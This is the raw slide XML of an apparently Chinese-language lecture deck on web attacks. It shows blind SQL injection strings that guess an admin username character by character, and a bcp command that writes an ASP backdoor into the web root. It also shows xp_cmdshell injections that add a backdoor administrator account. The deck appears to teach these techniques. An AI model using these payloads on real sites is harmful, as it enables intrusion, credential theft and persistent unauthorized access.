              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>http://SITE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xxx.asp?some_rec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0" err="1"/>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and (select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(username) from Admin)&gt; [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>guessed_length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字段值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>逐位猜解 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>http://SITE/xxx.asp?some_rec = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(mid(username,N,1)) from Admin)&gt;[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>guessed_ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>口令可能为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>散列后的密文</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>MD5Crack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234500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60648"/>
            <a:ext cx="8001000" cy="459904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>后门，得到默认账户权限 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566738" y="1340768"/>
            <a:ext cx="8001000" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后台管理界面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用提供的上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下载文件等功能上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器软件的默认账户权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>本地受限账户命令执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虚拟目录中文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下载</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MS SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "select codes from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp_tbl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>queryout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> c:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inetpub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wwwroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>runcommand.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foobar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="314469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263FA780-D3B7-5542-A04C-21F7AAA6B9F5}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4505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573EB84D-9DA3-234B-972B-C0C129121473}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45060" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="188640"/>
            <a:ext cx="8001000" cy="747936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3100" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>本地特权提升与利用数据库扩展存储过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45061" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566738" y="1752600"/>
            <a:ext cx="8109718" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>进一步本地权限提升</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>利用系统或某些特权应用服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Serv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>-U)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>安全漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>利用系统配置不当提升系统权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>MS SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>DBMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>支持扩展存储过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>帐户权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注入点执行相应的扩展存储过程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>添加有本地系统管理员权限的后门用户帐号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>http://SITE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>xxx.asp?some_rec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>master.xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> “net user name password /add”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>	http://SITE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>xxx.asp?some_rec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>master.xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> “net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> name administrators /add”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260473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990746BB-7CAC-E344-B66D-59B5111D887A}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2022年10月24日</a:t>
